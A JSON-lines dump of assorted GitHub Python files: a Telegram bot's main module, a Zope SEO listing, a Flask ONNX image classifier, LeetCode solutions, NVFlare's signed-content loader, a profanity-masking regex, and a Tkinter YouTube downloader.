**after promoting me, type /admincache in group to update the admin list.\"\n f\"\\n4. **add @IdzMusic to your group.\"\n f\"\\n5. **turn on the video chat first before start to play music.\\n\\n\"\n f\"\\n📌 **if the userbot not joined to video chat, make sure if the video chat already turned on, or you can ask Admins in @idzeroidsupport.**\\n\"\n f\"\\n⚡ __Powered by Aries A.I__\\n\",\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"[⇜]\", callback_data=\"aboutmanu_cbhelps\"\n ),\n InlineKeyboardButton(text=\"🔄\", callback_data=\"aboutmanu_howto\"),\n InlineKeyboardButton(\n text=\"[⇝]\", callback_data=\"aboutmanu_cbhelps\"\n ),\n ],\n ]\n ),\n )\n elif query.data == \"aboutmanu_cbhelps\":\n query.message.edit_text(\n text=f\"* 「 Music Command 」*\\n\"\n f\"\\n1. **/play (name song) for playing music.\"\n f\"\\n2. **/pause for paused music.\"\n f\"\\n3. **/resume for resume music.\"\n f\"\\n4. **/stop or /end for end music playing.\"\n f\"\\n5. **/music (name song) for download song.\"\n f\"\\n6. **/video (name video) for download video.\"\n f\"\\n7. **/lyrics for searching lyrics.\\n\\n\"\n f\"\\n📌 **Also you can download music or video with push button menu.**\\n\"\n f\"\\n⚡ __Powered by Aries A.I__\\n\",\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"[⇜]\", callback_data=\"aboutmanu_cbguide\"\n ),\n InlineKeyboardButton(text=\"🔄\", callback_data=\"aboutmanu_howto\"),\n InlineKeyboardButton(\n text=\"[⇝]\", callback_data=\"aboutmanu_cbguide\"\n ),\n ],\n ]\n ),\n )\n\n\n@typing_action\ndef get_help(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n args = update.effective_message.text.split(None, 1)\n\n # ONLY send help in PM\n if chat.type != chat.PRIVATE:\n if len(args) >= 2 and any(args[1].lower() == x for x in HELPABLE):\n module = args[1].lower()\n update.effective_message.animation(\n HELP_IMG,\n HELP_MSG,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Help\",\n url=\"t.me/{}?start=ghelp_{}\".format(\n context.bot.username, module\n ),\n )\n ]\n ]\n ),\n )\n return\n update.effective_message.reply_text(\n \"Contact me in PM to get the list of possible commands.\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Help\",\n url=\"t.me/{}?start=help\".format(context.bot.username),\n )\n ],\n [\n InlineKeyboardButton(\n text=\"Support\", url=f\"https://telegram.dog/idzeroidsupport\"\n ),\n InlineKeyboardButton(\n text=\"Updates\", url=\"https://telegram.dog/idzeroid\"\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"Music Setup\", callback_data=\"aboutmanu_cbguide\"\n ),\n ],\n ]\n ),\n )\n return\n\n elif len(args) >= 2 and any(args[1].lower() == x for x in HELPABLE):\n module = args[1].lower()\n text = (\n \"Here is the available help for the *{}* module:\\n\".format(\n HELPABLE[module].__mod_name__\n )\n + HELPABLE[module].__help__\n )\n send_help(\n chat.id,\n text,\n InlineKeyboardMarkup(\n [[InlineKeyboardButton(text=\"Back\", callback_data=\"help_back\")]]\n ),\n )\n\n else:\n send_help(chat.id, HELP_STRINGS)\n\n\ndef send_settings(chat_id, user_id, user=False):\n if user:\n if USER_SETTINGS:\n settings = \"\\n\\n\".join(\n \"*{}*:\\n{}\".format(mod.__mod_name__, mod.__user_settings__(user_id))\n for mod in USER_SETTINGS.values()\n )\n dispatcher.bot.send_message(\n user_id,\n \"These are your current settings:\" + \"\\n\\n\" + settings,\n parse_mode=ParseMode.MARKDOWN,\n 
)\n\n else:\n dispatcher.bot.send_message(\n user_id,\n \"Seems like there aren't any user specific settings available :'(\",\n parse_mode=ParseMode.MARKDOWN,\n )\n\n else:\n if CHAT_SETTINGS:\n chat_name = dispatcher.bot.getChat(chat_id).title\n dispatcher.bot.send_message(\n user_id,\n text=\"Which module would you like to check {}'s settings for?\".format(\n chat_name\n ),\n reply_markup=InlineKeyboardMarkup(\n paginate_modules(0, CHAT_SETTINGS, \"stngs\", chat=chat_id)\n ),\n )\n else:\n dispatcher.bot.send_message(\n user_id,\n \"Seems like there aren't any chat settings available :'(\\nSend this \"\n \"in a group chat you're admin in to find its current settings!\",\n parse_mode=ParseMode.MARKDOWN,\n )\n\n\ndef settings_button(update, context):\n query = update.callback_query\n user = update.effective_user\n mod_match = re.match(r\"stngs_module\\((.+?),(.+?)\\)\", query.data)\n prev_match = re.match(r\"stngs_prev\\((.+?),(.+?)\\)\", query.data)\n next_match = re.match(r\"stngs_next\\((.+?),(.+?)\\)\", query.data)\n back_match = re.match(r\"stngs_back\\((.+?)\\)\", query.data)\n try:\n if mod_match:\n chat_id = mod_match.group(1)\n module = mod_match.group(2)\n chat = context.bot.get_chat(chat_id)\n text = \"*{}* has the following settings for the *{}* module:\\n\\n\".format(\n escape_markdown(chat.title), CHAT_SETTINGS[module].__mod_name__\n ) + CHAT_SETTINGS[module].__chat_settings__(chat_id, user.id)\n query.message.edit_text(\n text=text,\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Back\",\n callback_data=\"stngs_back({})\".format(chat_id),\n )\n ]\n ]\n ),\n )\n\n elif prev_match:\n chat_id = prev_match.group(1)\n curr_page = int(prev_match.group(2))\n chat = context.bot.get_chat(chat_id)\n query.message.edit_text(\n \"Hi there! There are quite a few settings for *{}* - go ahead and pick what \"\n \"you're interested in.\".format(chat.title),\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n paginate_modules(\n curr_page - 1, CHAT_SETTINGS, \"stngs\", chat=chat_id\n )\n ),\n )\n\n elif next_match:\n chat_id = next_match.group(1)\n next_page = int(next_match.group(2))\n chat = context.bot.get_chat(chat_id)\n query.message.edit_text(\n \"Hi there! There are quite a few settings for *{}* - go ahead and pick what \"\n \"you're interested in.\".format(chat.title),\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n paginate_modules(\n next_page + 1, CHAT_SETTINGS, \"stngs\", chat=chat_id\n )\n ),\n )\n\n elif back_match:\n chat_id = back_match.group(1)\n chat = context.bot.get_chat(chat_id)\n query.message.edit_text(\n text=\"Hi there! There are quite a few settings for *{}* - go ahead and pick what \"\n \"you're interested in.\".format(escape_markdown(chat.title)),\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n paginate_modules(0, CHAT_SETTINGS, \"stngs\", chat=chat_id)\n ),\n )\n\n # ensure no spinny white circle\n context.bot.answer_callback_query(query.id)\n # query.message.delete()\n except Exception as excp:\n if excp.message == \"Message is not modified\":\n pass\n elif excp.message == \"Query_id_invalid\":\n pass\n elif excp.message == \"Message can't be deleted\":\n pass\n else:\n query.message.edit_text(excp.message)\n LOGGER.exception(\"Exception in settings buttons. 
%s\", str(query.data))\n\n\ndef get_settings(update: Update, context: CallbackContext):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n\n # ONLY send settings in PM\n if chat.type != chat.PRIVATE:\n if is_user_admin(chat, user.id):\n text = \"Click here to get this chat's settings, as well as yours.\"\n msg.reply_text(\n text,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Settings\",\n url=\"t.me/{}?start=stngs_{}\".format(\n context.bot.username, chat.id\n ),\n )\n ]\n ]\n ),\n )\n else:\n text = \"Click here to check your settings.\"\n\n else:\n send_settings(chat.id, user.id, True)\n\n\ndef migrate_chats(update, context):\n msg = update.effective_message # type: Optional[Message]\n if msg.migrate_to_chat_id:\n old_chat = update.effective_chat.id\n new_chat = msg.migrate_to_chat_id\n elif msg.migrate_from_chat_id:\n old_chat = msg.migrate_from_chat_id\n new_chat = update.effective_chat.id\n else:\n return\n\n LOGGER.info(\"Migrating from %s, to %s\", str(old_chat), str(new_chat))\n for mod in MIGRATEABLE:\n mod.__migrate__(old_chat, new_chat)\n\n LOGGER.info(\"Successfully migrated!\")\n raise DispatcherHandlerStop\n\n\ndef is_chat_allowed(update, context):\n if len(WHITELIST_CHATS) != 0:\n chat_id = update.effective_message.chat_id\n if chat_id not in WHITELIST_CHATS:\n context.bot.send_message(\n chat_id=update.message.chat_id, text=\"Unallowed chat! Leaving...\"\n )\n try:\n context.bot.leave_chat(chat_id)\n finally:\n raise DispatcherHandlerStop\n if len(BL_CHATS) != 0:\n chat_id = update.effective_message.chat_id\n if chat_id in BL_CHATS:\n context.bot.send_message(\n chat_id=update.message.chat_id, text=\"Unallowed chat! 
Leaving...\"\n            )\n            try:\n                context.bot.leave_chat(chat_id)\n            finally:\n                raise DispatcherHandlerStop\n    if len(WHITELIST_CHATS) != 0 and len(BL_CHATS) != 0:\n        chat_id = update.effective_message.chat_id\n        if chat_id in BL_CHATS:\n            context.bot.send_message(\n                chat_id=update.message.chat_id, text=\"Unallowed chat, leaving\"\n            )\n            try:\n                context.bot.leave_chat(chat_id)\n            finally:\n                raise DispatcherHandlerStop\n    else:\n        pass\n\n\ndef donate(update: Update, context: CallbackContext):\n    update.effective_message.from_user\n    chat = update.effective_chat  # type: Optional[Chat]\n    context.bot\n    if chat.type == \"private\":\n        update.effective_message.reply_text(\n            DONATE_STRING, parse_mode=ParseMode.MARKDOWN, disable_web_page_preview=True\n        )\n        update.effective_message.reply_text(\n            \"You can also donate to the person currently running me \"\n            \"[here]({})\".format(DONATION_LINK),\n            parse_mode=ParseMode.MARKDOWN,\n        )\n\n    else:\n        pass\n\n\ndef main():\n\n    if SUPPORT_CHAT is not None and isinstance(SUPPORT_CHAT, str):\n        try:\n            dispatcher.bot.sendMessage(\"@IdzeroidSupport\", \"⚡️\")\n        except Unauthorized:\n            LOGGER.warning(\n                \"Bot isn't able to send a message to support_chat, go and check!\"\n            )\n        except BadRequest as e:\n            LOGGER.warning(e.message)\n\n    test_handler = CommandHandler(\"test\", test, run_async=True)\n    start_handler = CommandHandler(\"start\", start, pass_args=True, run_async=True)\n\n    help_handler = CommandHandler(\"help\", get_help, run_async=True)\n    help_callback_handler = CallbackQueryHandler(\n        help_button, pattern=r\"help_\", run_async=True\n    )\n\n    settings_handler = CommandHandler(\"settings\", get_settings)\n    settings_callback_handler = CallbackQueryHandler(\n        settings_button, pattern=r\"stngs_\", run_async=True\n    )\n\n    about_callback_handler = CallbackQueryHandler(\n        aries_about_callback, pattern=r\"aboutmanu_\", run_async=True\n    )\n\n    donate_handler = CommandHandler(\"donate\", donate, run_async=True)\n\n    migrate_handler = MessageHandler(\n        Filters.status_update.migrate, migrate_chats, run_async=True\n    )\n    is_chat_allowed_handler = MessageHandler(\n        Filters.chat_type.groups, is_chat_allowed, run_async=True\n    )\n\n    # dispatcher.add_handler(test_handler)\n    dispatcher.add_handler(start_handler)\n    dispatcher.add_handler(about_callback_handler)\n    dispatcher.add_handler(help_handler)\n    dispatcher.add_handler(settings_handler)\n    dispatcher.add_handler(help_callback_handler)\n    dispatcher.add_handler(settings_callback_handler)\n    dispatcher.add_handler(migrate_handler)\n    dispatcher.add_handler(is_chat_allowed_handler)\n    dispatcher.add_handler(donate_handler)\n\n    dispatcher.add_error_handler(error_callback)\n\n    if WEBHOOK:\n        LOGGER.info(\"Using webhooks.\")\n        updater.start_webhook(listen=\"0.0.0.0\", port=PORT, url_path=TOKEN)\n\n        if CERT_PATH:\n            updater.bot.set_webhook(url=URL + TOKEN, certificate=open(CERT_PATH, \"rb\"))\n        else:\n            updater.bot.set_webhook(url=URL + TOKEN)\n        client.run_until_disconnected()\n\n    else:\n        LOGGER.info(\"Aries using long polling.\")\n        updater.start_polling(\n            timeout=15,\n            read_latency=4,\n            drop_pending_updates=True,\n            allowed_updates=Update.ALL_TYPES,\n        )\n\n    if len(argv) not in (1, 3, 4):\n        telethn.disconnect()\n    else:\n        telethn.run_until_disconnected()\n\n    updater.idle()\n\n\ntry:\n    ubot.start()\nexcept BaseException:\n    print(\"Userbot Error! 
Have you added a STRING_SESSION in deploying??\")\n sys.exit(1)\n\nif __name__ == \"__main__\":\n LOGGER.info(\"Successfully loaded modules: \" + str(ALL_MODULES))\n telethn.start(bot_token=TOKEN)\n pbot.start()\n main()\n","repo_name":"Aryza23/SaintAries","sub_path":"aries/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":39958,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"47"} +{"seq_id":"8894141769","text":"import cgi\nfrom zope import interface, schema, component\nfrom zope.location import Location\nfrom zope.component import getUtility, getMultiAdapter, queryMultiAdapter\nfrom zope.session.interfaces import ISession\nfrom zope.app.intid.interfaces import IIntIds\nfrom zope.traversing.browser import absoluteURL\nfrom zope.dublincore.interfaces import IDCTimes\n\nfrom zojax.layoutform import Fields, PageletEditForm\nfrom zojax.wizard.interfaces import ISaveable\nfrom zojax.wizard.step import WizardStepForm\nfrom zojax.catalog.interfaces import ICatalog\nfrom zojax.batching.session import SessionBatch\nfrom zojax.ownership.interfaces import IOwnership\nfrom zojax.content.type.interfaces import IItem, IContentViewView, IContentType\nfrom zojax.content.table.title import TitleColumn\nfrom zojax.content.table.interfaces import IContentsTable\nfrom zojax.table.table import Table\nfrom zojax.table.column import Column\nfrom zojax.pageelement.interfaces import IPageElement\nfrom zojax.principal.profile.interfaces import IPersonalProfile\n\nfrom zojax.seo.interfaces import _, ISEO, IHTMLTags\n\nSESSIONKEY = u'zojax.seo'\n\n\nclass ISearchForm(interface.Interface):\n\n searchableText = schema.TextLine(\n title = u'Searchable text',\n required = False)\n\n type = schema.List(\n title = u'Content type',\n value_type = schema.Choice(\n vocabulary='zojax.content.portalContent'),\n required = False)\n\n\nclass PortalContent(WizardStepForm):\n interface.implements(ISaveable)\n\n fields = Fields(ISearchForm)\n\n def __init__(self, context, *args):\n super(PortalContent, self).__init__(context, *args)\n\n self.ids = getUtility(IIntIds)\n\n def applyChanges(self, data):\n session = ISession(self.request)\n session[SESSIONKEY]['params'] = data\n return True\n\n def getContent(self):\n session = ISession(self.request)\n return session[SESSIONKEY].get('params', {})\n\n\nclass PortalContentsTable(Table):\n interface.implements(IContentsTable)\n component.adapts(ISEO, interface.Interface, interface.Interface)\n\n pageSize = 30\n sessionBatch = True\n enabledColumns = ('title', 'titletag', 'author',\n 'type', 'location', 'created')\n msgEmptyTable = _('No content.')\n\n def initDataset(self):\n catalog = getUtility(ICatalog)\n\n session = ISession(self.request)\n data = session[SESSIONKEY].get('params', {})\n\n query = {\n 'isDraft': {'any_of': (False,)},\n 'typeType': {'any_of': ('Portal type',)},\n 'sort_on': 'title',\n 'noPublishing': True, 'noSecurityChecks': True,\n }\n\n if 'type' in data and data['type']:\n query['type'] = {'any_of': data['type']}\n\n if 'searchableText' in data and data['searchableText']:\n query['searchableText'] = data['searchableText']\n\n try:\n self.dataset = catalog.searchResults(**query)\n except:\n self.dataset = ()\n\n\nclass TitleColumn(TitleColumn):\n component.adapts(ISEO, interface.Interface, PortalContentsTable)\n\n def update(self):\n self.ids = getUtility(IIntIds)\n self.contexturl = u'%s/index.html/content'%absoluteURL(\n self.context, self.request)\n\n def contentUrl(self):\n return 
u'%s/view.html?id=%s'%(\n self.contexturl, self.ids.getId(self.content))\n\n\nclass TitleTagColumn(Column):\n component.adapts(ISEO, interface.Interface, PortalContentsTable)\n\n title = _('HTML title tag')\n\n def query(self, default=None):\n pageelement = getMultiAdapter(\n (self.content, self.request, None), IPageElement, u'page.title')\n return pageelement.updateAndRender()\n\n def render(self):\n return cgi.escape(self.query().strip()[7:-8])\n\n\nclass ContentView(PageletEditForm):\n\n fields = Fields(IHTMLTags)\n\n title = u''\n description = u''\n\n def update(self):\n try:\n content = getUtility(IIntIds).getObject(\n int(self.request.get('id')))\n except:\n self.redirect('./')\n return\n\n self.content = content\n\n item = IItem(content, None)\n if item is not None:\n self.title = item.title\n self.description = item.description\n\n dctimes = IDCTimes(content)\n self.created = dctimes.created\n self.modified = dctimes.modified\n\n pagetitle = getMultiAdapter(\n (content, self.request, None), IPageElement, u'page.title')\n self.pagetitle = cgi.escape(pagetitle.updateAndRender().strip()[7:-8])\n\n super(ContentView, self).update()\n\n def getContent(self):\n return self.content\n\n def getLocation(self):\n request = self.request\n content = self.content.__parent__\n\n item = IItem(content, None)\n\n title = u''\n description = u''\n if item is not None:\n title = item.title\n description = item.description\n\n view = queryMultiAdapter((content, request), IContentViewView)\n if view is not None:\n url = '%s/%s'%(absoluteURL(content, request), view.name)\n else:\n url = '%s/'%absoluteURL(content, request)\n\n return {'url': url,\n 'title': title or _('[No title]'),\n 'content': content,\n 'icon': queryMultiAdapter((content, request), name='zmi_icon'),\n 'description': description or u''}\n\n def getAuthor(self):\n ownership = IOwnership(self.content, None)\n if ownership is not None:\n principal = ownership.owner\n else:\n principal = None\n\n if principal is not None:\n request = self.request\n profile = IPersonalProfile(principal)\n\n info = {'title': profile.title,\n 'profile': ''}\n\n space = profile.space\n if space is not None:\n info['profile'] = '%s/'%absoluteURL(space, request)\n\n return info\n\n def getContentType(self):\n ct = IContentType(self.content)\n\n return {'title': ct.title,\n 'icon': queryMultiAdapter(\n (self.content, self.request), name='zmi_icon')}\n","repo_name":"Zojax/zojax.seo","sub_path":"src/zojax/seo/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":6233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"17536347958","text":"from flask import Flask, render_template, request\nimport onnxruntime as ort\nfrom PIL import Image\nfrom torchvision import transforms\nimport os\nimport torch\n\napp = Flask(__name__)\n\n# Path to the ONNX model file\nmodel_path = 'mobilenet_v2.onnx'\n\n# Create an ONNXRuntime inference session\nort_session = ort.InferenceSession(model_path)\n\ndef preprocess_image(image_path):\n \"\"\"\n Preprocesses the image before feeding it into the model.\n \"\"\"\n image = Image.open(image_path)\n transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]\n )\n ])\n image = transform(image).unsqueeze(0)\n return image\n\ndef predict(image_path):\n \"\"\"\n Performs image classification using the pre-trained MobileNetV2 
model.\n \"\"\"\n try:\n # Preprocess the image\n image = preprocess_image(image_path)\n \n # Get the input and output names of the ONNX model\n input_name = ort_session.get_inputs()[0].name\n output_name = ort_session.get_outputs()[0].name\n \n with torch.no_grad():\n # Run the inference using the ONNXRuntime session\n output = ort_session.run([output_name], {input_name: image.numpy()})[0]\n \n # Convert the output to a torch tensor\n predicted = torch.from_numpy(output)\n \n # Perform post-processing to get the predicted class\n _, predicted = torch.max(predicted, 1)\n class_index = predicted.cpu().numpy()[0]\n \n # Load the class labels\n with open('imagenet_classes.txt') as f:\n classes = [line.strip() for line in f.readlines()]\n \n # Get the predicted class label\n prediction = classes[class_index]\n prediction = prediction.split(\",\")[1].strip().capitalize()\n \n return prediction\n except Exception as e:\n # Handle any exceptions that occur during prediction\n error_msg = \"Error: Failed to preprocess or classify the image. Please ensure the image is in a supported format and try again.\"\n print(f\"{error_msg}\\n{e}\")\n return error_msg\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n \"\"\"\n Handles the index route and performs image classification.\n \"\"\"\n prediction = None\n uploaded_image = None\n \n if request.method == 'POST':\n # Retrieve the uploaded file from the request\n file = request.files['file']\n filename = file.filename\n \n # Save the uploaded file\n file_path = os.path.join('static', filename)\n file.save(file_path)\n \n uploaded_image = file_path\n \n # Perform prediction on the uploaded image\n prediction = predict(file_path)\n \n if request.args.get('clear') == 'True':\n # Clear the uploaded image and prediction\n uploaded_image = None\n prediction = None\n \n return render_template('index.html', prediction=prediction, image=uploaded_image)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"schmij03/onnxsw5","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24120359673","text":"# https://leetcode.com/problems/regular-expression-matching/submissions/\n\nclass Solution:\n def isMatch(self, s: str, p: str) -> bool:\n memo = {}\n \n def dp(i,j):\n \n if (i,j) in memo:\n return memo[(i,j)]\n \n \n if j == len(p):\n flag = i==len(s)\n memo[(i,j)] = flag\n return flag\n \n first_match = i < len(s) and (p[j] =='.' 
or p[j] == s[i])\n \n if j < len(p)-1 and p[j+1] =='*':\n dp_ans = dp(i,j+2) or (first_match and dp(i+1,j))\n else:\n dp_ans = (first_match and dp(i+1,j+1))\n \n memo[(i,j)] = dp_ans \n return memo[(i,j)]\n \n return dp(0,0)","repo_name":"munagekar/cp","sub_path":"leetcode/regular_expresion_matching.py","file_name":"regular_expresion_matching.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40439607823","text":"import json\nimport os\nfrom base64 import b64decode\nfrom enum import Enum\n\nfrom cryptography import x509\nfrom cryptography.exceptions import InvalidSignature\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import padding\n\n\nclass LoadResult(Enum):\n \"\"\"Constants for different results when loading secure content.\"\"\"\n\n OK = \"ok\"\n NOT_MANAGED = \"notManaged\"\n NO_SUCH_CONTENT = \"noSuchContent\"\n NOT_SIGNED = \"notSigned\"\n INVALID_SIGNATURE = \"invalidSignature\"\n INVALID_CONTENT = \"invalidContent\"\n\n\nclass SecurityContentManager(object):\n def __init__(self, content_folder, signature_filename=\"signature.json\", root_cert=\"rootCA.pem\"):\n \"\"\"Content manager used by SecurityContentService to load secure content.\n\n Args:\n content_folder (str): the folder path that includes signature file\n signature_filename (str, optional): the signature file (signed dictionary). Defaults to \"signature.json\".\n root_cert (str, optional): root CA certificate filename. Defaults to \"rootCA.pem\".\n \"\"\"\n self.content_folder = content_folder\n signature_path = os.path.join(self.content_folder, signature_filename)\n rootCA_cert_path = os.path.join(self.content_folder, root_cert)\n if os.path.exists(signature_path) and os.path.exists(rootCA_cert_path):\n self.signature = json.load(open(signature_path, \"rt\"))\n for k in self.signature:\n self.signature[k] = b64decode(self.signature[k].encode(\"utf-8\"))\n cert = x509.load_pem_x509_certificate(open(rootCA_cert_path, \"rb\").read(), default_backend())\n self.public_key = cert.public_key()\n self.valid_config = True\n else:\n self.signature = dict()\n self.valid_config = False\n\n def load_content(self, file_under_verification):\n \"\"\"Loads the data of the file under verification and verifies that the signature is valid.\n\n Args:\n file_under_verification: file to load and verify\n\n Returns:\n A tuple of the file data and the LoadResult. 
File data may be None if the data cannot be loaded.\n \"\"\"\n full_path = os.path.join(self.content_folder, file_under_verification)\n data = None\n if not os.path.exists(full_path):\n return data, LoadResult.NO_SUCH_CONTENT\n\n with open(full_path, \"rb\") as f:\n data = f.read()\n if not data:\n return data, LoadResult.NO_SUCH_CONTENT\n\n if self.valid_config and file_under_verification in self.signature:\n signature = self.signature[file_under_verification]\n try:\n self.public_key.verify(\n signature=signature,\n data=data,\n padding=padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),\n algorithm=hashes.SHA256(),\n )\n result = LoadResult.OK\n except InvalidSignature:\n result = LoadResult.INVALID_SIGNATURE\n else:\n result = LoadResult.NOT_SIGNED\n return data, result\n\n\nclass SecurityContentService(object):\n \"\"\"Uses SecurityContentManager to load secure content.\"\"\"\n\n security_content_manager = None\n\n @staticmethod\n def initialize(content_folder: str, signature_filename=\"signature.json\", root_cert=\"rootCA.pem\"):\n if SecurityContentService.security_content_manager is None:\n SecurityContentService.security_content_manager = SecurityContentManager(\n content_folder, signature_filename, root_cert\n )\n\n @staticmethod\n def load_content(file_under_verification):\n if not SecurityContentService.security_content_manager:\n return None, LoadResult.NOT_MANAGED\n\n return SecurityContentService.security_content_manager.load_content(file_under_verification)\n\n @staticmethod\n def load_json(file_under_verification):\n if not SecurityContentService.security_content_manager:\n return None, LoadResult.NOT_MANAGED\n\n json_data = None\n\n data_bytes, result = SecurityContentService.security_content_manager.load_content(file_under_verification)\n\n if data_bytes:\n try:\n data_text = data_bytes.decode(\"ascii\")\n json_data = json.loads(data_text)\n except json.JSONDecodeError:\n return None, LoadResult.INVALID_CONTENT\n\n return json_data, result\n","repo_name":"NVIDIA/NVFlare","sub_path":"nvflare/fuel/sec/security_content_service.py","file_name":"security_content_service.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","stars":455,"dataset":"github-code","pt":"47"} +{"seq_id":"377069293","text":"# sub(pattern, repl, string, count=0, flags=0)\t用指定的字符串替换原字符串中与正则表达式匹配的模式可以用count指定替换的次数\n\nimport re\n\n\ndef main():\n sentence = '你丫是傻叉吗? 我操你大爷的. Fuck you.'\n purified = re.sub('[操肏艹]|fuck|shit|傻[比屄逼叉缺吊屌]|煞笔',\n '*',\n sentence,\n flags=re.IGNORECASE)\n print(purified) # 你丫是*吗? 我*你大爷的. 
* you.\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"kxl666/kxl-Python","sub_path":"2.Python高阶/01.爬虫/1.基本库的使用/正则表达式/替换字符串中的不良内容.py","file_name":"替换字符串中的不良内容.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"17479876635","text":"#\n# @lc app=leetcode.cn id=215 lang=python3\n#\n# [215] Kth Largest Element in an Array\n#\n\n# @lc code=start\nfrom typing import List\n\n\nclass Solution:\n    # def findKthLargest(self, nums: List[int], k: int) -> int:\n    #     # Min-heap implementation\n    #     # Time complexity: O(N log k)\n    #     # Space complexity: O(k), to store the heap elements\n    #     import heapq\n    #     heap = nums[:k]\n    #     heapq.heapify(heap)\n    #     for i in nums[k:]:\n    #         if i > heap[0]:\n    #             heapq.heapreplace(heap, i)\n    #     return heap[0]\n\n    def findKthLargest(self, nums: List[int], k: int) -> int:\n        # Quickselect, based on the quicksort partition idea\n        # Time complexity: O(N)\n        # Space complexity: O(1), partitions in place\n        def partition(left, right):\n            '''Partition step'''\n            pivot = nums[left]\n            while left < right:\n                while left < right and nums[right] >= pivot:\n                    right -= 1\n                nums[left] = nums[right]\n                while left < right and nums[left] <= pivot:\n                    left += 1\n                nums[right] = nums[left]\n            nums[left] = pivot\n            return left\n\n        n = len(nums)\n        target = n - k\n        left = 0\n        right = n - 1\n        while True:\n            base = partition(left, right)\n            if base == target:\n                return nums[base]\n            elif target > base:\n                left = base + 1\n            else:\n                right = base - 1\n\n\n# @lc code=end\n","repo_name":"psychopurp/LeetCodeDaily","sub_path":"数组/215.数组中的第k个最大元素.py","file_name":"215.数组中的第k个最大元素.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"23201409802","text":"from os import path\nimport os\n\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom moviepy import *\nfrom moviepy.editor import VideoFileClip\nfrom pytube import YouTube\n\n\nimport shutil\n\n\n#functions\ndef select_path():\n    #allows user to select a path from the explorer\n    path = filedialog.askdirectory()\n    path_label.config(text=path)\n\ndef download_video():\n    #get the video link\n    get_link = link_field.get()\n    #get selected path\n    user_path = path_label.cget(\"text\")\n    screen.title(\"Downloading Youtube Video...\")\n    #download video\n    mp4_video = YouTube(get_link).streams.get_highest_resolution().download()\n    vid_clip = VideoFileClip(mp4_video)\n    vid_clip.close()\n    #move video to selected directory\n    shutil.move(mp4_video, user_path)\n    screen.title(\"Download Complete! Let's Download Another Video or Audio...\")\n\ndef download_audio():\n    #get the audio link\n    get_link = link_field.get()\n    #get selected path\n    user_path = path_label.cget(\"text\")\n    screen.title(\"Downloading Youtube Audio...\")\n    #download audio\n    mp3_audio = YouTube(get_link).streams.filter(only_audio=True).first()\n    audio_file = mp3_audio.download()\n\n    #rename mp3 from video title\n    base, ext = os.path.splitext(audio_file)\n    new_file = base + \".mp3\"\n    os.rename(audio_file, new_file)\n\n    #move audio to selected directory\n    shutil.move(new_file, user_path)\n    screen.title(\"Download Complete! 
Let's Download Another Audio or Video...\")\n\nscreen = Tk()\ntitle = screen.title('Youtube Audio & Video Downloader')\ncanvas = Canvas(screen, width=500, height=500)\ncanvas.pack()\n\n#image logo\nlogo_img = PhotoImage(file='yt.png')\n#resize image\nlogo_img = logo_img.subsample(14, 14)\n\ncanvas.create_image(250, 80, image=logo_img)\n\n#link field\nlink_field = Entry(screen, width=50)\nlink_label = Label(screen, text=\"Enter Youtube Video Link\", font=(\"Arial\", 13))\n\n#add widgets to window\ncanvas.create_window(250, 180, window=link_label)\ncanvas.create_window(250, 220, window=link_field)\n\n#select path to place file\npath_label = Label(screen, text=\"Select Path For File\", font=(\"Arial\", 13))\nselect_btn = Button(screen, text=\"Select\", command=select_path)\n\n#add to window\ncanvas.create_window(250, 280, window=path_label)\ncanvas.create_window(250, 320, window=select_btn)\n\n#download video button\ndownload_mp4_btn = Button(screen, text=\"Download Video (mp4)\", command= download_video)\n#add mp4 dwndld btn to canvas\ncanvas.create_window(250, 380, window=download_mp4_btn)\n\n#download audio button\ndownload_mp3_btn = Button(screen, text=\"Download Audio (mp3)\", command= download_audio)\n#add mp3 dwndld btn to canvas\ncanvas.create_window(250, 420, 